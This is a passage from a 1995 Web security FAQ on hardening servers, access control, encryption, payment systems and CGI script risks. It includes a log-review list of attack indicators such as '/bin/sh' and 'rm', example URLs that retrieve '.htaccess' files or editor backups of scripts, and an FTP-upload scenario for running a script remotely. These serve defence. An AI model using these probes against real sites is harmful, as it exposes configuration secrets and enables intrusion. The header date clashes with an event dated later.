The World Wide Web Security FAQ

Lincoln D. Stein <lstein@genome.wi.mit.edu>
Version 1.1.5, January 2, 1995

CONTENTS

  1. Introduction
  2. What's New?
  3. General Questions
  4. Running a Secure Server
  5. Protecting Confidential Documents at Your Site
  6. CGI Scripts
  7. Safe Scripting in Perl
  8. Server Logs and Privacy
  9. Client Side Security
  10. Bibliography

1. Introduction

This is the World Wide Web Security Frequently Asked Question list (FAQ). It attempts to answer some of the most frequently asked questions relating to the security implications of running a Web server. There is also a short section on Web security from the browser's perspective.

Copies of this document can be obtained at:

The author of this FAQ has very limited experience with the Macintosh and Windows servers. Web servers for these operating systems are pretty new, and there hasn't been much time for collective wisdom on the security issues for these platforms to form. I apologize for the pronounced Unix (and Linux) bias in this document. Help in fleshing out these topics is welcomed!

Much of this document is abstracted from the author's book "How to Set Up and Maintain a World Wide Web Site", published by Addison-Wesley.

This document is © copyright 1995, Lincoln D. Stein. However it may be freely reprinted and redistributed.

Many thanks to the following people for their helpful comments and contributions to this document:

Table of contents

2. What's New?

  1. Version 1.1.5
  2. Version 1.1.4
  3. Version 1.1.3
  4. Version 1.1.2
  5. Version 1.1.1
  6. Version 1.1

3. General Questions

Q1: What's to worry about?

Unfortunately, there's a lot to worry about. The moment you install a Web server at your site, you've opened a window into your local network that the entire Internet can peer through. Most visitors are content to window shop, but a few will try to to peek at things you don't intend for public consumption. Others, not content with looking without touching, will attempt to force the window open and crawl in.

It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes.

Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole.


Q2: Exactly what security risks are we talking about?

There are basically four overlapping types of risk:
  1. Private or confidential documents stored in the Web site's document tree falling into the hands of unauthorized individuals.
  2. Private or confidential information sent by the remote user to the server (such as credit card information) being intercepted.
  3. Information about the Web server's host machine leaking through, giving outsiders access to data that can potentially allow them to break into the host.
  4. Bugs that allow outsiders to execute commands on the server's host machine, allowing them to modify and/or damage the system. This includes "denial of service" attacks, in which the attackers pummel the machine with so many requests that it is rendered effectively useless.


Q3: Are some operating systems more secure to use as platforms for Web servers than others?

The answer is yes, although the Unix community may not like to hear it. In general, the more powerful and flexible the operating system, the more open it is for attack through its Web (and other) servers.

Unix systems, with their large number of built-in servers, services, scripting languages, and interpreters, are particular vulnerable to attack because there are simply so many portals of entry for hackers to exploit. Less capable systems, such as Macintoshes and MS-Windows machines, are less easy to exploit. Then again it's harder to accomplish really cool stuff on these machines, so you have a tradeoff between convenience and security.

Of course you always have to factor in the experience of the people running the server host and software. A Unix system administered by a seasoned Unix administrator will probably be more secure than a MS Windows system set up by a novice.


Q4: Are some Web server software programs more secure than others?

Again, the answer is yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.

Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server (available at http://hoohoo.ncsa.uiuc.edu/) or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA ( http://www.hyperreal.com/apache/info.html) is also free of this bug.

Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.

The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed. Information on WN's security features can be found in its online documentation at:

http://hopf.math.nwu.edu/docs/security.html

A table comparing the features of a large number of commercial, freeware and public domain servers has been put together by Paul Hoffman and is also available online:

http://www.proper.com/www/servers-chart.html


Q5: Are CGI scripts insecure?

CGI scripts are a major source of security holes. Although the CGI (Common Gateway Interface) protocol is not inherently insecure, CGI scripts must be written with just as much care as the server itself. Unfortunately some scripts fall short of this standard and trusting Web administrators install them at their sites without realizing the problems.

Q6: Are server-side includes insecure?

Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.


Q7: What general security precautions should I take?

For Web servers running on Unix systems, here are some general security precautions to take:
  1. Limit the number of login accounts available on the machine. Delete inactive users.
  2. Make sure that people with login privileges choose good passwords. The Crack program will help you detect poorly-chosen passwords:

ftp://ftp.cert.org/pub/tools/crack/

3. Turn off unused services. For example, if you don't need to run FTP on the Web server host, physically remove the ftp daemon. Likewise for tftp, sendmail, gopher, NIS (network information services) clients, NFS (networked file system), finger, systat, and anything else that might be hanging around. Check the file /etc/inetd.conf for a list of daemons that may be lurking, and comment out the ones you don't use.

4. Remove shells and interpreters that you don't absolutely need. For example, if you don't run any Perl-based CGI scripts, remove the Perl interpreter.

5. Check both the system and Web logs regularly for suspicious activity. The program Tripwire is helpful for scanning the system logs and sensitive files for break in attempts:

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/

More on scanning Web logs for suspicious activity below.

6. Make sure that permissions are set correctly on system files, to discourage tampering. The program COPS is useful for this:

ftp://ftp.cert.org/pub/tools/cops/

Be alert to the possibility that a _local_ user can accidentally make a change to the Web server configuration file or the document tree that opens up a security hole. You should set file permissions in the document and server root directories such that only trusted local users can make changes. Many sites create a "www" group to which trusted Web authors are added. The document root is made writable only by members of this group. To increase security further, the server root where vital configuration files are kept, is made writable only by the official Web administrator. Many sites create a "www" user for this purpose.


Q8: Where can I learn more about general network security measures?

Good books to get include:

A source of timely information, including the discovery of new security holes, are the CERT Coordination Center advisories, posted to the newsgroup comp.security.announce, and archived at:

ftp://ftp.cert.org/pub/cert_advisories/

A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:

SUBSCRIBE www-security your_email_address

A series of security FAQs is mainted by Internet Security Systems, Inc. The FAQs can be found at:

http://www.iss.net/iss/faq.html

The main WWW FAQ also contains questions and answers relevant to Web security, such as log file management and sources of server software. The most recent version of this FAQ can be found at:

http://sunsite.unc.edu/boutell/faq/www_faq.html Table of contents


4. Running a Secure Server

Q9: How do I set the file permissions of my server and document roots?

To maximize security, you should adopt a strict "need to know" policy for both the document root (where HTML documents are stored) and the server root (where log and configuration files are kept). It's most important to get permissions right in the server root because it is here that CGI scripts and the sensitive contents of the log and configuration files are kept.

You need to protect the server from the prying eyes of both local and remote users. The simplest strategy is to create a "www" user for the Web administration/webmaster and a "www" group for all the users on your system who need to author HTML documents. On Unix systems edit the /etc/passwd file to make the server root the home directory for the www user. Edit /etc/group to add all authors to the www group.

The server root should be set up so that only the www user can write to the configuration and log directories and to their contents. It's up to you whether you want these directories to also be readable by the www group. They should _not_ be world readable. The cgi-bin directory and its contents should be world executable and readable, but not writable (if you trust them, you could local web authors write permission for this directory). Following are the permissions for a sample server root:

drwxr-xr-x   5 www      www          1024 Aug  8 00:01 cgi-bin/
drwxr-x---   2 www      www          1024 Jun 11 17:21 conf/
-rwx------   1 www      www        109674 May  8 23:58 httpd
drwxrwxr-x   2 www      www          1024 Aug  8 00:01 htdocs/
drwxrwxr-x   2 www      www          1024 Jun  3 21:15 icons/
drwxr-x---   2 www      www          1024 May  4 22:23 logs/
The Netsite Commerce Server appears to contain a bug that prevents you from setting up the server root with correct permissions. In order to start up, this server requires that the logs directory either be writable by the "nobody" user, or that a log file writable by the "nobody" user already exist in that directory. In either case this represents a security hole, because it means that a remote user who was infiltrated the system by subverting a CGI script or the server itself can cover his tracks by modifying or deleting the access log file. It is not known if this bug affects the Netsite (non-Commerce) Server. (Thanks to Laura Pearlman for this information.)

The document root has different requirements. All files that you want to serve on the Internet must be readable by the server while it is running under the permissions of user "nobody". You'll also usually want local Web authors to be able to add files to the document root freely. Therefore you should make the document root directory and its subdirectories owned by user and group "www", world readable, and group writable:

drwxrwxr-x   3 www      www          1024 Jul  1 03:54 contents
drwxrwxr-x  10 www      www          1024 Aug 23 19:32 examples
-rw-rw-r--   1 www      www          1488 Jun 13 23:30 index.html
-rw-rw-r--   1 lstein   www         39294 Jun 11 23:00 resource_guide.html

Many servers allow you to restrict access to parts of the document tree to Internet browsers with certain IP addresses or to remote users who can provide a correct password (see below). However, some Web administrators may be worried about unauthorized _local_ users gaining access to restricted documents present in the document root. This is a problem when the document root is world readable.

One solution to this problem is to run the server as something other than "nobody", for example as another unprivileged user ID that belongs to the "www" group. You can now make the restricted documents group- but not world-readable (don't make them group-writable unless you want the server to be able to overwrite its documents!). The documents can now be protected for prying eyes both locally and globally. Remember set the read and execute permissions for any restricted server scripts as well.

The CERN server generalizes this solution by allowing the server to execute under different user and group privileges for each part of a restricted document tree. See the CERN documentation for details on how to set this up.


Q10: I'm running a server that provides a whole bunch of optional features. Are any of them security risks?

Yes. Many features that increase the convenience of using and running the server also increase the chances of a security breach. Here is a list of potentially dangerous features. If you don't absolutely need them turn them off.
Automatic directory listings
Knowledge is power and the more the remote hacker can figure out about your system the more chance for him to find loopholes. The automatic directory listings that the CERN, NCSA, Netscape, Apache, and other servers offer are convenient, but have the potential to give the hacker access to sensitive information. This information can include: Emacs backup files containing the source code to CGI scripts, source-code control logs, symbolic links that you once created for your convenience and forgot to remove, directories containing temporary files, etc.

Of course, turning off automatic directory listings doesn't prevent people from fetching files whose names they guess at. It also doesn't avoid the pitfall of an automatic text keyword search program that inadvertently adds the "hidden" file to its index. To be safe, you should remove unwanted files from your document root entirely.

Symbolic link following
Some servers allow you to extend the document tree with symbolic links. This is convenient, but can lead to security breaches when someone accidentally creates a link to a sensitive area of the system, for example /etc. A safer way to extend the directory tree is to include an explicit entry in the server's configuration file (this involves a PathAlias directive in NCSA-style servers, and a Pass rule in the CERN server).

The NCSA and Apache servers allows you to turn symbolic link following off completely. Another option allows you to enable symbolic link following only if the owner of the link matches the owner of the link's target (i.e. you can compromise the security of a part of the document tree that you own, but not someone else's part).

Server side includes
The "exec" form of server side includes are a major security hole. Their use should be restricted to trusted users or turned off completely. In NCSA httpd and Apache, you can turn off the exec form of includes in a directory by placing this statement in the appropriate directory control section of access.conf:
      Options IncludesNoExec
User-maintained directories
Allowing any user on the host system to add documents to your Web site is a wonderfully democratic system. However, you do have to trust your users not to open up security holes. This can include their publishing files that contain sensitive system information, as well as creating CGI scripts, server side includes, or symbolic links that open up security holes. Unless you really need this feature, it's best to turn it off. When a user needs to create a home page, it's probably best to give him his own piece of the document root to work in, and to make sure that he understands what he's doing. Whether home pages are located in user's home directories or in a piece of the document root, it's best to disallow server-side includes and CGI scripts in this area.

Q11: I hear that running the server as "root" is a bad idea. Is this true?

This has been the source of some misunderstanding and disagreement on the Net. Most servers are launched as root so that they can open up the low numbered port 80 (the standard HTTP port) and write to the log files. They then wait for an incoming connection on port 80. As soon as they receive this connection, they fork a child process to handle the request and go back to listening. The child process, meanwhile, changes its effective user ID to the user "nobody" and then proceeds to process the remote request. All actions taken in response to the request, such as executing CGI scripts or parsing server-side includes, are done as the unprivileged "nobody" user.

This is not the scenario that people warn about when they talk about "running the server as root". This warning is about servers that have been configured to run their _child processes_ as root, (e.g. by specifying "User root" in the server configuration file). This is a whopping security hole because every CGI script that gets launched with root permissions will have access to every nook and cranny in your system.

Some people will say that it's better not to start the server as root at all, warning that we don't know what bugs may lurk in the portion of the server code that controls its behavior between the time it starts up and the time it forks a child. This is quite true, although the source code to all the public domain servers is freely available and there don't _seem_ to be any bugs in these portions of the code. Running the server as an ordinary unprivileged user may be safer. Many sites launch the server as user "nobody", "daemon" or "www". However you should be aware of two potential problems with this approach:

  1. You won't be able to open port 80 (at least not on Unix systems). You'll have to tell the server to listen to another port, such as 8000 or 8080.
  2. You'll have to make the configuration files readable by the same user ID you run the server under. This opens up the possibility of an errant CGI script reading the server configuration files. Similarly, you'll have to make the log files both readable and writable by this user ID, making it possible for a subverted server or CGI script to alter the log. See the discussion of file permissions above.

Q12: I want to share the same document tree between my ftp and Web servers. Is there any problem with this idea?

Many sites like to share directories between the FTP daemon and the Web daemon. This is OK so long as there's no way that a remote user can upload files that can later be read or executed by the Web daemon.

Consider this scenario: the WWW server that has been configured to execute any file ending with the extension ".cgi". Using your ftp daemon, a remote hacker uploads a perl script to your ftp site and gives it the .cgi extension. He then uses his browser to request the newly-uploaded file from your Web server. Bingo! he's fooled your system into executing the commands of his choice.

You can overlap the ftp and Web server hierarchies, but be sure to limit ftp uploads to an "incoming" directory that can't be read by the "nobody" user.


Q13: Can I make my site completely safe by running the server in a "chroot" environment?

You can't make your server completely safe, but you can increase its security significantly in a Unix environment by running it in a chroot environment. The chroot system command places the server in a "silver bubble" in such a way that it can't see any part of the file system beyond a directory tree that you have set aside for it. The directory you designate becomes the server's new root "/" directory. Anything above this directory is inaccessible.

In order to run a server in a chroot environment, you have to create a whole miniature root file system that contains everything the server needs access to. This includes special device files and shared libraries. You also need to adjust all the path names in the server's configuration files so that they are relative to the new root directory. To start the server in this environment, place a shell script around it that invokes the chroot command in this way:

   chroot /path/to/new/root /server_root/httpd

Setting up the new root directory can be tricky and is beyond the scope of this document. See the author's book (above), for details. You should be aware that a chroot environment is most effective when the new root directory is as barren as possible. There shouldn't be any interpreters, shells, or configuration files (including /etc/passwd!) in the new root directory. Unfortunately this means that CGI scripts that rely on Perl or shells won't run in the chroot environment. You can add these interpreters back in, but you lose some of the benefits of chroot.

Also be aware that chroot only protects files; it's not a panacea. It doesn't prevent hackers from breaking into your system in other ways, such as grabbing system maps from the NIS network information service, or playing games with NFS.


Q14: My local network runs behind a firewall. Can I use it to increase my Web site's security?

You can use a firewall to enhance your site's security in a number of ways. The most straightforward way use of a firewall is to create "internal site", one that is accessible only to computers within your own local area network. If this is what you want to do,then all you need to do is to place the server INSIDE the firewall:
          other hosts
                     \
       server <-----> FIREWALL <------> OUTSIDE
                     /
          other hosts

However, if you want to make the server available to the rest of the world, you'll need to place it somewhere outside the firewall. From the standpoint of security of your organization as a whole, the safest place to put it is completely outside the local area network:

          other hosts
                     \
   other hosts <----> FIREWALL <---> server <----> OUTSIDE
                     /
          other hosts

This is called a "sacrificial lamb" configuration. The server is at risk of being broken into, but at least when it's broken into it doesn't breach the security of the inner network.

It's _not_ a good idea to run the WWW server on the firewall machine. Now any bug in the server will compromise the security of the entire organization.

There are a number of variations on this basic setup, including architectures that use paired "inner" and "outer" servers to give the world access to public information while giving the internal network access to private documents. See the author's book for the gory details.


Q15: My local network runs behind a firewall. Can I break through the firewall to give the rest of the world access to the Web server?

You can, but if you do this you are opening up a security hole in the firewall. It's far better to make the server a "sacrificial lamb" as described above. Some firewall architectures, however, don't give you the option of placing the host outside the firewall. In this case, you have no choice but to open up a hole in the firewall. There are two options:
  1. If you are using a "screened host" type of firewall, you can selectively allow the firewall to pass requests for port 80 that are bound to or returning from the WWW server machine. This has the effect of poking a small hole in the dike through which the rest of the world can send and receive requests to the WWW server machine.
  2. If you are using a "dual homed gateway" type of firewall, you'll need to install a proxy on the firewall machine. A proxy is a small program that can see both sides of the firewall. Requests for information from the Web server are intercepted by the proxy, forwarded to the server machine, and the response forwarded back to the requester. A small and reliable HTTP proxy is available from TIS systems at:

ftp://ftp.tis.com/pub/firewalls/toolkit/

The CERN server can also be configured to act as a proxy. I feel much less comfortable recommending it, however, because it is a large and complex piece of software that may contain unknown security holes.

More information about firewalls is available in the books Firewalls and Internet Security by William Cheswick and Steven Bellovin, and Building Internet Firewalls by D. Brent Chapman and Elizabeth D. Zwicky.


Q16: How can I detect if my site's been broken into?

For Unix systems, the tripwire program periodically scans your system and detects if any system files or programs have been modified. It is available at

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/

You should also check your access and error log files periodically for suspicious activity. Look for accesses involving system commands such as "rm", "login", "/bin/sh" and "perl", or extremely long lines in URL requests (the former indicate an attempt to trick a CGI script into invoking a system command; the latter an attempt to overrun a program's input buffer). Also look for repeated unsuccessful attempts to access a password protected document. These could be symptomatic of someone trying to guess a password.

Table of Contents


5. Protecting Confidential Documents at Your Site

Q17: What types of access restrictions are available?

There are three types of access restriction available:
  1. Restriction by IP address, subnet, or domain

    Individual documents or whole directories are protected in such a way that only browsers connecting from certain IP (Internet) addresses, IP subnets, or domains can access them.

  2. Restriction by user name and password

    Documents or directories are protected so that the remote user has to provide a name and password in order to get access.

  3. Encryption using public key cryptography

    Both the request for the document and the document itself are encrypted in such a way that the text cannot be read by anyone but the intended recipient. Public key cryptography can also be used for reliable user verification. See below.


Q18: How safe is restriction by IP address or domain name?

Restriction by IP address is secure against casual nosiness but not against a determined hacker. There are several ways around IP address restrictions. With the proper equipment and software, a hacker can "spoof" his IP address, making it seem as if he's connecting from a location different from his real one. Nor is there any guarantee that the person contacting your server from an authorized host is in fact the person you think he is. The remote host may have been broken into and is being used as a front. To be safe, IP address restriction must be combined with something that checks the identify of the user, such as a check for user name and password.

IP address restriction can be made much safer by running your server behind a firewall machine that is capable of detecting and rejecting attempts at spoofing IP addresses. Such detection works best for intercepting packets from the outside world that claim to be from trusted machines on your internal network.

One thing to be aware of is that if a browser is set to use a proxy server to fetch documents, then your server will only know about the IP address of the proxy, not the real user's. This means that if the proxy is in a trusted domain, anyone can use that proxy to access your site. Unless you know that you can trust a particular proxy to do its own restriction, don't add the IP address of a proxy (or a domain containing a proxy server) to the list of authorized addresses.

Restriction by host or domain name has the same risks as restriction by IP address, but also suffers from the risk of "DNS spoofing", an attack in which your server is temporarily fooled into thinking that a trusted host name belongs to an alien IP address. To lessen that risk, some servers can be configured to do an extra DNS lookup for each client. After translating the IP address of the incoming request to a host name, the server uses the DNS to translate from the host name back to the IP address. If the two addresses don't match, the access is forbidden. See below for instructions on enabling this feature in NCSA's httpd


Q19: How safe is restriction by user name and password?

Restriction by user name and password also has its problems. A password is only good if it's chosen carefully. Too often users choose obvious passwords like middle names, their birthday, their office phone number, or the name of a favorite pet goldfish. These passwords can be guessed at, and WWW servers, unlike Unix login programs, don't complain after repeated unsuccessful guesses. A determined hacker can employ a password guessing program to break in by brute force. You also should be alert to the possibility of remote users sharing their user names and passwords. It is more secure to use a combination of IP address restriction and password than to use either of them alone.

Another problem is that the password is vulnerable to interception as it is transmitted from browser to server. It is not encrypted in any meanginful way, so a hacker with the right hardware and software can pull it off the Internet as it passes through. Furthermore, unlike a login session, in which the password is passed over the Internet just once, a browser sends the password each and every time it fetches a protected document. This makes it easier for a hacker to intercept the transmitted data as it flows across the Internet. To avoid this, you have to encrypt the data. See below.

If you need to protect documents against _local_ users on the server's host system, you'll need to run the server as something other than "nobody" and to set the permissions of both the restricted documents and server scripts so that they're not world readable. See Q9.


Q20: What is user authentication?

User verification is any system that for determining, and verifying, the identity of a remote user. User name and password is a simple form of user authentication. Public key cryptographic systems, described below, provide a more sophisticated form authentication that uses an unforgeable electronic signature.

Q21: How do I restrict access to documents by the IP address or domain name of the remote browser?

The details are different for each server. See your server's documentation for details. For servers based on NCSA httpd, you'll need to add a directory control section to access.conf that looks something like this:
   <Directory /full/path/to/directory>
<Limit GET POST> order mutual-failure deny from all allow from 192.198.2 .zoo.org allow from 18.157.0.5 stoat.outback.au </Limit> </Directory>

This will deny access to everybody but the indicated hosts (18.157.0.5 and stoat.outback.au), subnets (182.198.2) and domains (.zoo.org). Although you can use either numeric IP addresses or host names, it's safer to use the numeric form because this form of identification is less easily subverted (Q18).

One way to increase the security of restriction by domain name is to make sure that your server double-checks the results of its DNS lookups. You can enable this feature in NCSA's httpd (and the related Apache server) by making sure that the -DMAXIMUM_DNS flag is set in the Makefile.

For the CERN server, you'll need to declare a protection scheme with the Protection directive, and associate it with a local URL using the Protect directive. An entry in httpd.conf that limits access to certain domains might look like this:

   Protection LOCAL-USERS {
GetMask @(*.capricorn.com, *.zoo.org, 18.157.0.5) }
Protect /relative/path/to/directory/* LOCAL-USERS

Q22: How do I add new users and passwords?

Unix-based servers use password and group files similar to the like-named Unix files. Although the format of these files are similar enough to allow you to use the Unix versions for the Web server, this isn't a good idea. You don't want to give a hacker whose guessed a Web password carte blanche to log into the Unix host.

Check your server documentation for the precise details of how to add new users. For NCSA httpd, you can add a new user to the password file using the htpasswd program that comes with the server software:

   htpasswd /path/to/password/file username

htpasswd will then prompt you for the password to use. The first time you invoke htpasswd you must provide a -c flag to create the password file from scratch.

The CERN server comes with a slightly different program called htadm:

   htadm -adduser /path/to/password/file username

htadm will then prompt you for the new password.

After you add all the authorized users, you can attach password protection to the directories of your choice. In NCSA httpd and its derivatives, add something like this to access.conf:

   <Directory /full/path/to/protected/directory>

     AuthName          name.of.your.server
     AuthType          Basic
     AuthUserFile      /usr/local/etc/httpd/conf/passwd
     <Limit GET POST>
       require valid-user
     </Limit>

</Directory>
You'll need to replace AuthUserFile with the full path to the password file. This type of protection can be combined with IP address restriction as described in the previous section. See NCSA's online documentation (http://hoohoo.ncsa.uiuc.edu/) or the author's book for more details.

For the CERN server, the corresponding entry in httpd.conf looks like this:

   Protection AUTHORIZED-USERS {
     AuthType     Basic
     ServerID     name.of.your.server
     PasswordFile /usr/local/etc/httpd/conf/passwd
     GetMask      All
}
Protect /relative/path/to/directory/* AUTHORIZED-USERS
Again, see the documentation or the author's book for details.

Q23: Isn't there a CGI script to allow users to change their passwords online?

There are several, but the author doesn't know of any that have been sufficiently well tested to recommend. This is a tricky thing to set up, and a good general script has not yet been made publicly available. Some sites have solved this problem by setting up a second HTTP server for the sole purpose of changing the password file. This server listens on a different port from the primary server, and runs with sufficient permissions so that it can write to the password file (e.g., it runs as user "www").

Q24: Using per-directory access control files to control access to directories is so convenient, why should I use access.conf?

Instead of placing directory access restrictions directives in centralized configuration files, most servers give you the ability to control access by putting a "hidden" file in the directory you want to restrict access to (this file is called ".htaccess" in NCSA-derived servers and ".www_acl" in the CERN server). It is very convenient to use these files since you can adjust the restrictions on a directory without having to edit the central access control file. There are several problems with relying on .htaccess files too heavily. One is that with access control files scattered all over the document hierarchy, there is no central place where the access policy for the site is clearly set out. Another problem is that it is easy for these files to get modified or overwritten inadverently, opening up a section of the document tree to the public. Finally, there is a bug in many servers (including the NCSA server)that allows the access control files to be fetched just like any other file using a URL such as:
   http://your.site.com/protected/directory/.htaccess
This is clearly an undesirable feature since it gives out important information about your system, including the location of the server password file.

Another problem with the the per-directory access files is that if you ever need to change the server software, it's a lot easier to update a single central access control file than to search and fix a hundred small files.


Q25: How does encryption work?

Encryption works by encoding the text of a message with a key. In traditional encryption systems, the same key was used for both encoding and decoding. In the new public key or asymmetric encryption systems, keys come in pairs: one key is used for encoding and another for decoding. In this system everyone owns a unique pair of keys. One of the keys, called the public key, is widely distributed and used for encoding messages. The other key, called the private key, is a closely held secret used to decrypt incoming message. Under this system, a person who needs to send a message to a second person can encrypt the message with that person's public key. The message can only be decrypted by the owner of the secret private key, making it safe from interception. This system can also be used to create unforgeable digital signatures.

Most practical implementations of secure Internet encryption actually combine the traditional symmetric and the new asymmetric schemes. Public key encryption is used to negotiate a secret symmetric key that is then used to encrypt the actual data.

Since commercial ventures have a critical need for secure transmission on the Web, there is very active interest in developing schemes for encrypting the data that passes between browser and server.

More information on public key cryptography can be found in the book "Applied Cryptography", by Bruce Schneier.


Q26: What are: SSL, SHTTP, Shen?

These are all proposed encryption and user authentication standards for the Web. Each requires the right combination of compatible browser and server to operate, so none is yet the universal solution to the secure data transmission problem.

SSL (Secure Socket Layer) is the scheme proposed by Netscape Communications Corporation. It is a low level encryption scheme used to encrypt transactions in higher-level protocols such as HTTP, NNTP and FTP. The SSL protocol includes provisions for server authentication (verifying the server's identity to the client), encryption of data in transit, and optional client authentication (verifying the client's identity to the server). SSL is currently implemented commercially only for Netscape browsers and some Netscape servers. (While both the data encryption and server authentication parts of the SSL protocol are implemented, client authentication is not yet available.) Open Market, Inc. has also announced plans to support SSL in a forthcoming version of their HTTP server. Details on SSL can be found at:

http://home.netscape.com/info/SSL.html

SHTTP (Secure HTTP) is the scheme proposed by CommerceNet, a coalition of businesses interested in developing the Internet for commercial uses. It is a higher level protocol that only works with the HTTP protocol, but is potentially more extensible than SSL. Currently SHTTP is implemented for the Open Marketplace Server marketed by Open Market, Inc on the server side, and Secure HTTP Mosaic by Enterprise Integration Technologies on the client side. See here for details:

http://www.commerce.net/information/standards/drafts/shttp.txt

Shen is scheme proposed by Phillip Hallam-Baker of CERN. Like SHTTP it is a high level replacement for the existing HTTP protocol. It hasn't yet been implemented in production quality software at the current time. You can read about it at:

http://www.w3.org/hypertext/WWW/Shen/ref/security_spec.html


Q27: How do I accept credit card orders over the Web?

You can always instruct users to call your 800 number :-). Seriously, though, you _shouldn't_ ask remote users to submit their credit card number in a fill-out form field unless you are using an encrypting server/browser combination. Your alternate is to use one of the credit card proxy systems described in the next section.

Even with an encrypting server, you should be careful about what happens to the credit card number after it's received by the server. For example, if the number is received by a server script, make sure not to write it out to a world-readable log file or send it via e-mail to a remote site.


Q28: What are: First Virtual Accounts, DigiCash, Cybercash?

These are all schemes that have been developed to process commercial transactions over the Web without transmitting credit card numbers.

The First Virtual scheme, designed for low- to medium-priced software sales and fee-for-service information purchases, the user signs up for a First Virtual account by telephone call. During the sign up procedure he provides his credit card number and contact information, and receives a First Virtual account number in return. Thereafter, to make purchases at participating online vendors, the user provides his First Virtual account number in lieue of his credit card information. First Virtual later contacts him by e-mail, and he has the chance to approve or disapprove the purchase before his credit card is billed. First Virtual is in operation now and requires no special software or hardware on the user's or merchant's sides of the connection. More information can be obtained at:

http://www.fv.com/

Digicash, a product of the Netherlands Digicash company, is a debit system something like an electronic checking account. In this system, users make an advance lump sum payment to a bank that supports the DigiCash system, and receive "E-cash" in turn. Users then make purchases electronically and the E-cash is debited from their checking accounts. This system is currently in development and has not been released for public use. It also appears to require special client software to be installed on both the user's and the merchant's computers. For more information:

http://www.digicash.nl/

Cybercash, invented by the Cybercash Corporation, is both a debit and a credit card system. In credit card mode, the user installs specialized software on his computer. When the WWW browser needs to obtain a credit card number, it invokes the Cybercash software which pops up a window that requests the number. The number is then encrypted and transmitted to corresponding software installed on the merchant's machine. In debit mode, a connection is established to a participating bank. Cybercash is in the pilot phase, and more information can be obtained at:

http://www.cybercash.com

In addition to these forms of credit card payment, the Netscape Communications Corporation has made deals with both First Data, a large credit card processor, and MasterCard to incorporate credit card processing into the Netscape/Netsite combination. These arrangements, when implemented, will use Netscape's built-in encryption to encode and approve credit card purchases without additional software. For more information, check the literature at:

http://www.mcom.com/

Open Market, Inc., is also offering credit card purchases. In this scheme, Open Market acts as the credit card company itself, handling subscriptions, billing and accounting. The scheme is integrated into its Open Marketplace Server, and requires a browser that supports the SHTTP protocol (only Secure Mosaic, at the moment). This service too is in the pilot stage. More information is available from Open Market at:

http://www.openmarket.com

Table of contents


6. CGI (Server) Scripts

Q29: What's the problem with CGI scripts?

The problem with CGI scripts is that each one presents yet another opportunity for exploitable bugs. CGI scripts should be written with the same care and attention given to Internet servers themselves, because, in fact, they are miniature servers. Unfortunately, for many Web authors, CGI scripts are their first encounter with network programming.

CGI scripts can present security holes in two ways:

  1. They may intentionally or unintentionally leak information about the host system that will help hackers break in.
  2. Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

CGI scripts are potential security holes even though you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high numbered port (it just needs to execute a few commands in Perl to accomplish this). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.


Q30: Is it better to store scripts in the cgi-bin directory, or to store them anywhere in the document tree and identify them to the server using the .cgi extension?

Although there's nothing intrinsically dangerous about scattering CGI scripts around the document tree, it's better to store them in the cgi-bin directory. Because CGI scripts are such potentially large security holes, it's much easier to keep track of what scripts are installed on your system if they're kept in a central location rather than being scattered around among multiple directories. This is particularly true in an environment with multiple Web authors. It's just too easy for an author to inadverently create a buggy CGI script and install it somewhere in the document tree. By restricting CGI scripts to the cgi-bin directory and by setting up permissions so that only the Web administrator can install these scripts, you avoid this chaotic situation.

There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A cgi-bin directory with tightly-controls lessens the possibility of this happening.


Q31: Are compiled languages such as C safer than interpreted languages like Perl and shell scripts?

The answer is "yes", but with many qualifications and explanations.

First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.

Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:

        http://your-site/a/path/your_script.cgi~

(This is another good reason to limit CGI scripts to cgi-bin and to make sure that cgi-bin is separate from the document root.)

